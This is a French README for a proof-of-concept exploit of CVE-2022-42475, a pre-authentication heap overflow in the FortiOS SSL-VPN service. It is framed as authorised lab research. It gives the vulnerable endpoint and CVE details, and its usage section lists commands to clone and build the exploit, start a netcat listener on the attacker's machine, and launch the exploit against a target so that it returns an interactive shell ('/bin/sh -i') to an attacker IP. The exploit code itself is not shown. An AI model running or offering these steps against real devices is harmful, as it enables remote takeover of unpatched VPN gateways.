
Preuve de concept (PoC) pour la recherche et la validation contrôlée en laboratoire de CVE-2022-42475, une vulnérabilité critique de débordement de tampon basé sur le tas affectant le service SSL-VPN de certaines versions de FortiOS.
Exécution de code à distance avant authentification sur SSL VPN Fortinet
CVE-2022-42475 est une vulnérabilité de dépassement de tampon basé sur le tas (heap-based buffer overflow) dans le service SSL VPN de FortiOS qui permet à des attaquants non authentifiés d'exécuter du code arbitraire à distance (RCE) via des requêtes HTTP spécialement conçues envoyées au point de terminaison /remote/error.
Cette vulnérabilité a été activement exploitée dans la nature (0-day) avant la publication du correctif officiel.
La capture suivante montre l'exécution du PoC dans un environnement de laboratoire autorisé :
La sortie montre l'exécution du PoC et l'interaction avec l'instance FortiOS utilisée pour les tests.

| Champ | Valeur |
|---|
| ID CVE | CVE-2022-42475 |
| CVSS 3.1 | 9.3 (Critique) |
| Vecteur | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CWE | CWE-122 |
| Découvert | Décembre 2022 |
| Correctif officiel | FortiOS 7.2.3, 7.0.9, 6.4.11, 6.2.12, 6.0.16 |
# Cloner ou télécharger le code source
git clone https://github.com/uLl0a/cve-2022-42475-poc
cd cve-2022-42475-poc
# Compiler
go build -o exploit exploit.go
# Ou exécuter directement
go run exploit.go <cible> <port> <ip_reverse> <paramètres>
./exploit <hôte_cible> <port_cible> <ip_reverse> <param1> [param2...]
# Sur l'attaquant, démarrer un listener
nc -lvnp 80
# Exécuter l'exploit
./exploit 192.168.1.100 443 10.0.0.5 /bin/sh -i